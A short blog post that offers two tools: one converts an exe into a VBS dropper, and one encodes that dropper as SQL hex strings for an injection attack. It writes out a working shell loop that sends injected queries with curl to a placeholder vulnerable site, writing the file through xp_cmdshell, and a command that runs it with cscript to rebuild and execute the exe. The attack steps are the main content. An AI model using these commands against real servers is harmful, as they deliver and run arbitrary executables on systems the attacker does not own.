0x0Lab Blog Just another damn blog


Converting an exe file to vbs and back to exe

It is often useful to be able to convert an exe file to a string which will be able to reproduce the exe file. This can be used in a variety of ways (send by email, from an SQL injection, etc.).
Here you can find two tools.
The first is a simple exe to vbs converter. Much like the 'exe2vbs.rb' tool that comes with Metasploit, exe_to_vbs.php will take an exe file as its input and generate a .vbs file, which when executed will write the initial .exe file in the %TEMP% directory (by removing the ' from the last line of the vbs file, it will also execute the exe file).

The second tool can be used in an SQL injection scenario, and will take as input the file generated from the previous tool. Its output will be a number of SQL hex strings (that will run xp_cmdshell to output the file in the %TEMP% directory), that can be used as follows:
for line in `./file_to_sqlhex.php notepad.vbs`; do curl -I "http://injectable.site/sql.asp?query=declare%20@q%20nvarchar(4000);select%20@q=$line;exec(@q);"; done
When the above is execute it will generate the notepad.vbs file in %TEMP%. The tool also has a duplicate line detection, avoiding possible overwrites of the file. The vbs can then be easily executed using xp_cmdshell (exec master..xp_cmdshell 'cscript %TEMP%\notepad.vbs //B //Nologo') and will create the exe file in the %TEMP% directory.

Download: exe_to_vb.php
Download: file_to_sqlhex.php

Posted by cirrus

Comments (1) Trackbacks (0)
  1. What do i need to use to open the .php files

Leave a comment

No trackbacks yet.